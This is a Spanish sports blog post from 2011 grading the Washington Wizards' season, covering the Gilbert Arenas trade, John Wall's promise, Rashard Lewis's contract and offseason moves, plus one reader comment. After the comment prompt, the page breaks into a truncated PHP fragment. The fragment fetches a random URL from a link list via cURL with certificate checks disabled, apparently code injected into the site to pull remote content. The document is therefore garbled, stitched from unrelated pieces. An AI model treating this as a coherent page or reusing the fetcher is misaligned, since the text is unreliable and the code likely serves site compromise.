Washington Wizards: Suspenso

22 de June de 2011 por TheDeerHunter

El año pasado les dimos un merecido “Muy deficiente” y este año los resultados han sido aún peores. Últimos de la Sudeste con un 28% de victorias, tan sólo una más que los Raptors y 4 más que Cleveland, situados en el peor tercio de la liga en puntos anotados, recibidos y asistencias (penúltimos en este apartado) además de una inestabilidad que se ha reflejado en la participación de hasta 23 jugadores durante el curso. ¿Porqué les damos un “generoso” suspenso entonces?

Primero porque han cerrado de un portazo la infame etapa alrededor de “Agent Zero”. A pesar de que Arenas inició el curso con una aparente actitud positiva y rindiendo razonablemente bien los responsables del equipo no quisieron riesgos y lo traspasaron en cuanto tuvieron ocasión aún a costa de asumir otro contrato nocivo como es el de Rashard Lewis. Cuidar a la nueva perla es prioritario y todos conocemos la mentalidad “Far West” de la antigua estrella del equipo. La posibilidad de un “duelo a muerte en la calle principal” o un “este tugurio es demasiado pequeño para los dos” estaba ahí. La decisión es acertada porque ha naturalizado el cambio de era y ha permitido mirar únicamente al futuro desde muy pronto.

Segundo porque efectivamente hay futuro. Se aprecia. No ha podido ser Rookie del año John “Wonder” Wall, por causas ajenas y propias, pero sí ha demostrado que hay mimbres de jugador especial. Él personifica más que nadie la promesa de un gran proyecto en la capital pero también hemos podido disfrutar de interesantes muestras de talento de Blatche, Nick Young, McGee como también de otro rookie incorporado Jordan Crawford. No han tenido tanta suerte de momento con Booker pero aún disponen para el próximo draft del 6º pick con el que podrían incorporar otra interesante promesa.

Obviamente todavía queda camino que recorrer y el principal enemigo ahora es la inexperiencia. Nadie les exijirá el próximo año grandes resultados pero sí habrá mucha gente gustosa por pagar una entrada para verles jugar. El tiempo pondrá a cada uno en su sitio y el futuro parece ser más de ellos que de muchos otros.

Lo mejor: El cambio efectivo de era. Las gratas impresiones de gran director que ofrece John Wall. El concurso de mates de JaVale McGee. El rendimiento general de los jóvenes.

Lo peor: Asumir más de 20 kilos por año (hasta casi 24 el último) durante lo que le queda de contrato a Rashard Lewis. El flojo aprovechamiento de Jianlian y de Trevor Booker. El hecho de que como mínimo se van a tirar otro año tragando muchas derrotas.

Jugando a GM:

– Tratar, en la medida de lo posible, de no incluir este verano en ningún traspaso a Blatch, Crawford, McGee… y lógicamente tampoco a Wall.

– Qualifying Offer para Nick Young, obviamente no para Yi Jianlian. Habría que renovar a Young, aunque no a cualquier precio.

– Intentaría por todos los medios cambiar la posición 6 y la posición 18 por la posición 4 a los Cavaliers. Hay overbooking de jovenes y diría que a los Cavs podrían venirles bien dos elecciones. En función de lo que decidan hacer con Booker habría que ir a por Kanter o a por Vesely/Leonard.

– Con el eje de la plantilla cubierta y menos de 40 millones comprometidos completaría las posiciones con veteranos de perfil medio/bajo para ayudar. El punto clave devería ser la temporada 2012/2013 en el final del contrato de Rashard, cuando estarían en disposición de hacer saltar la banca con algún bombazo. Los contratos que se firmen nunca deberían comprometer esa fecha a no ser alguien muy interesante.

Comenta

Un comentario a esta entrada

  1. Esteban dice:
    #1

    comparto el gm, 0 fichajes a largo plazo, este equipo debe salir a la cancha con wall y crawford como referencias esta temporada, y ver que resultados dan, llegar al 12 con espacio en el tope, si son un equipo con potencial demostrado y dinero en el tope, hasta podrian ir por howard

    si wall, crawford, mcgee y blatche, progresan este año, mucho obviamente, podrian hasta ser un equipo de play offs, joven y con dinero, quiza una plaza como washintong y un buen equipo, y mucha plata podria ser visto con buenos ojos por howard, que entraria en un equipo donde no debe resignar dinero, es un equipo joven q tiene para largo plazo equipo y contratos cualificados (a diferencia de los migcs) y pelear en la capital por un titulo

    como? estos jugadores nombrados, mas howard, tamb le permitirian fichar por el espacio, otra mega estrella que los ayuda, o renovar a lewis por menos dinero y ofrecer un contrato no tan alto a west

    lo veo posible

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>